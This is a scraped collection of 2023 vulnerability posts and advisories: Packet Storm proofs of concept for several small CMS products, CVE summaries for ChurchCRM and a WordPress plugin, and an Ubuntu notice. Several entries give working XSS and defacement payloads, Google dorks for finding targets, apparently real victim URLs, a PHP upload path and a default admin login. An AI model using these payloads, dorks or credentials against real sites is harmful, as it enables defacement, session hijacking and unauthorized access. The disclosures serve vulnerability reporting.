eHato CMS version 1.0 suffers from a cross site scripting vulnerability.

**eHato CMS 1.0 Cross Site Scripting**

Posted Aug 9, 2023

Authored by indoushka

eHato CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 288795acae37e9889703f9a9e13f4dc91e382a11ff20d9b6c617e50c574fefb2

Download | Favorite | View

**eHato CMS 1.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : eHato CMS 1.0 XSS Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.ehato.com                                                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2[+] http://wtatcs.orgtw/news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,924)
*   Arbitrary (16,191)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,343)
*   DoS (23,415)
*   Encryption (2,369)
*   Exploit (51,833)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,142)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,753)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,361)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,765)
*   Web (9,661)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,926)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,418)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,709)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,803)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

eHato CMS 1.0 Cross Site Scripting

Dexx CMS HTML and Site Builder version 2.2.3 suffers from cross site scripting and arbitrary file upload vulnerabilities.

====================================================================================================================================  
| # Title     : Dexx CMS - HTML and Site Builder V2.2.3 Remote File Upload vulnerability                                           |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla Firefox 114.0.1 (64 bits)                                          |   
| # Vendor    : https://www.ezwsb.com/                                                                                             |    
| # Dork      : "Our award-winning templates are the most beautiful way to present your ideas online."                             |  
====================================================================================================================================

[+] P0C : 

[+] The script is based on Laravel framework so you can apply the vulnerability for the framework

    https://dl.packetstormsecurity.net/2301-exploits/laravel9470-disclose.txt

  [-] XSS via file upload :

[+] Dorking İn Google Or Other Search Enggine.

[+] Register as a member of the target site .

[+] After registering, log in and go to /account/settings .

[+] path : https://127.0.0.1/storage/avatars/9SCDIW0ntFJYqaP9IfrOqhJfzNoyukqmbEOtJxH8.svg 

[-] Unrestricted File Upload :

[+] Go to ( Dashboard/Projects/New)to create a new project or Choose a template for your project .

[+] Choose Edit Image and upload your malicious file .

[+] path : https://127.0.0.1/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/ogSIFm8ztsQv4BBEy9Ci96utafSBsu45oe1RhL3y.htm

           https://127.0.0.1/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/kNHGCajolk2LcxsEZq8Q5sGn9p7Pt7gO5nOO1zwz.txt

           https://127.0.0.1/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/50otMfIHgIlJz3OFyuBMjeOSKaXs9a49YLZuaMlK.jpg

                  https://127.0.0.1/storage/projects/26/7u3ps1joxTO0o1e3jZYfvb3klddh3GFzS1dh/images/kc4FLhcYIWBq7AhOHTpxWwjPxwKRe4vX8nmLBahh.php

====Greetings to :=========================================================================================================================  
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |  
===========================================================================================================================================

Dexx CMS HTML And Site Builder 2.2.3 XSS / Arbitrary File Upload

DevSoft Arge Bilişim CMS version 1.0.0 suffers from a cross site scripting vulnerability.

    ======================================================================================================================================| # Title     : DevSoft Arge Bilişim CMS V1.0.0 XSS Vulnerability                                                                    || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                               | | # Vendor    : https://devsoft.com.tr/                                                                                              |  | # Dork      : intext:''Web Yazılım: Devsoft''                                                                                      |======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /urunler.php?id=90'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/adabrokercomtr/urunler.php?id=90%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DevSoft Arge Bilişim CMS 1.0.0 Cross Site Scripting

Desenvolvido Buscazip Guiaking CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Desenvolvido Buscazip Guiaking CMS v1.0 XSS Vulnerability                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://buscazip.com.br/                                                                                           |  | # Dork      : intext:Site desenvolvido por Buscazip, Guiaking Empresas                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload :  /imovel.php?id=22'<script>alert(/indoushka/);</script>[+] https://ariquemes190combr/imovel.php?id=22%27%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Desenvolvido Buscazip Guiaking CMS 1.0 Cross Site Scripting

The Real Estate Manager plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 6.7.1 due to insufficient restriction on the 'rem_save_profile_front' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_capabilities' parameter during a profile update.

CVE-2023-4239: shortcodes.class.php in real-estate-manager/tags/6.7.1/classes – WordPress Plugin Repository

social-media-skeleton is an uncompleted social media project implemented using PHP, MySQL, CSS, JavaScript, and HTML. Versions 1.0.0 until 1.0.3 have a stored cross-site scripting vulnerability. The problem is patched in v1.0.3.


**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-39518: Fix XSS issue by M0ck3d · Pull Request #4 · fobybus/social-media-skeleton

SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive information via the volopp1 and volopp2 parameters within the /QueryView.php.

**CVE-Disclosures**

Welcome to the CVE disclosures section of this repository! Here, you'll find a list of security vulnerabilities that I have discovered while working on Free Open Source Software (FOSS) applications.

**CVEs I Have Discovered**

Findings

Description

CVE-2023-38758

A stored cross-site scripting (XSS) vulnerability in wger Workout Manager v2.2.0a3 allows remote attackers to inject arbitrary web script or HTML via the license_author parameter of the /en/nutrition/ingredient/add/ endpoint.

CVE-2023-38759

A cross-site request forgery (CSRF) vulnerability in wger Workout Manager v2.2.0a3 allows remote attackers to gain privileges via email change and password reset functionality at /en/user/preferences, /en/gym/user/1/reset-user-password, and /en/user/password/reset/. These attack vectors can allow any account to be compromised, with resulting data exfiltrated back to the attacker's server.

CVE-2023-38760

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the role and gender parameters within the /QueryView.php?QueryID=7 endpoint (Person by Role and Gender query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38761

A cross site scripting (XSS) vulnerability in ChurchCRM v5.0.0 allows remote attackers to inject arbitrary web script or HTML via a crafted payload to the systemSettings.php endpoint. This payload is placed within the site header and is triggered whenever anyone authenticated views any page. This vulnerability can be used to execute arbitrary JavaScript code within the victim's session, perform information disclosure, or potentially perform other CSRF attacks.

CVE-2023-38762

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the friendmonths parameter within the /QueryView.php?QueryID=26 endpoint (Recent Friends query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38763

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows an authenticated remote attacker to obtain sensitive database information via the FundRaiserID parameter within the /FundRaiserEditor.php endpoint. This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38764

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the birthmonth and percls parameters within the /QueryView.php?QueryID=18 endpoint (Birthdays query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38765

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the membermonth parameter within the /QueryView.php?QueryID=22 endpoint (Membership Anniversaries query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38766

A cross site scripting (XSS) vulnerability in ChurchCRM v5.0.0 allows remote attackers to inject arbitrary web script or HTML via a crafted payload to the PersonView.php endpoint. An authenticated attacker can perform stored XSS by editing their user profile. This payload is triggered whenever anyone views this user's profile. This vulnerability can be used to execute arbitrary JavaScript code within the victim's session, perform information disclosure, or potentially perform other CSRF attacks.

CVE-2023-38767

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the value and custom parameters within the /QueryView.php?QueryID=200 endpoint (CustomSearch query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38768

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the PropertyID parameter within the /QueryView.php?QueryID=9 endpoint (Person by Property query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38769

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the searchstring and searchwhat parameters within the /QueryView.php?QueryID=15 endpoint (Advanced Search query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38770

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the group parameter within the /QueryView.php?QueryID=21 endpoint (Registered Students query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38771

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the volopp parameter within the /QueryView.php?QueryID=25 endpoint (Volunteers - 'for a particular opportunity' query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38773

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the volopp1 and volopp2 parameters within the /QueryView.php?QueryID=100 endpoint (Volunteers - 'who match two specific codes' query). This can be used for information disclosure of anything in the database, including user credentials.

_I will update this list as soon as new vulnerabilities are found and available for public disclosure._

CVE-2023-38773: GitHub - 0x72303074/CVE-Disclosures

Ubuntu Security Notice 6277-1 - It was discovered that Dompdf was not properly validating untrusted input when processing HTML content under certain circumstances. An attacker could possibly use this issue to expose sensitive information or execute arbitrary code. This issue only affected Ubuntu 16.04 LTS. It was discovered that Dompdf was not properly validating processed HTML content that referenced PHAR files, which could result in the deserialization of untrusted data. An attacker could possibly use this issue to execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6277-1August 08, 2023php-dompdf vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in Dompdf.Software Description:- php-dompdf: HTML to PDF converterDetails:It was discovered that Dompdf was not properly validating untrusted input whenprocessing HTML content under certain circumstances. An attacker couldpossibly use this issue to expose sensitive information or execute arbitrarycode. This issue only affected Ubuntu 16.04 LTS.(CVE-2014-5011, CVE-2014-5012, CVE-2014-5013)It was discovered that Dompdf was not properly validating processed HTMLcontent that referenced PHAR files, which could result in the deserializationof untrusted data. An attacker could possibly use this issue to executearbitrary code. (CVE-2021-3838)It was discovered that Dompdf was not properly validating processed HTMLcontent that referenced both a remote base and a local file, which couldresult in the bypass of a chroot check. An attacker could possibly use thisissue to expose sensitive information. (CVE-2022-2400)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:php-dompdf 0.6.2+dfsg-3ubuntu0.20.04.1Ubuntu 18.04 LTS (Available with Ubuntu Pro):php-dompdf 0.6.2+dfsg-3ubuntu0.18.04.1~esm1Ubuntu 16.04 LTS (Available with Ubuntu Pro):php-dompdf 0.6.1+dfsg-2ubuntu1+esm1In general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-6277-1CVE-2014-5011, CVE-2014-5012, CVE-2014-5013, CVE-2021-3838,CVE-2022-2400Package Information:https://launchpad.net/ubuntu/+source/php-dompdf/0.6.2+dfsg-3ubuntu0.20.04.1

Ubuntu Security Notice USN-6277-1

Video Whisper Conference version 1.01 suffers from a cross site scripting vulnerability.

    ============================================================================| # Title     : video whisper conference v1.01 XSS Vulnerability           || # Author    : indoushka                                                  || # Tested on : windows 10 Français V.(Pro)                                || # Vendor    : https://www.videowhisper.com/demos/conference/             |  | # Dork      : "Video Conference by VideoWhisper.com"                     |============================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : indoushka<acx><marquee><font color=lime size=32>indoushka</font></marquee>[+] https://wwvideowhispercom/demos/conference/index.php?r=indoushka<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Video Whisper Conference 1.01 Cross Site Scripting

Videoflix CMS version 1.3 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Videoflix Cms v1.3 Insecure Settings Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://codecanyon.net/item/videoflix-tv-series-movie-subscription-portal-cms/20839016                             |  | # Dork      : "Made with by Vmax-Studio."                                                                                        |====================================================================================================================================poc : [+] Dorking İn Google Or Other Search Enggine .[+] Users : login email : admin@videoflix.com, password : abcdefg [+] http://arabflixcom/index.php?admin/dashboardGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#php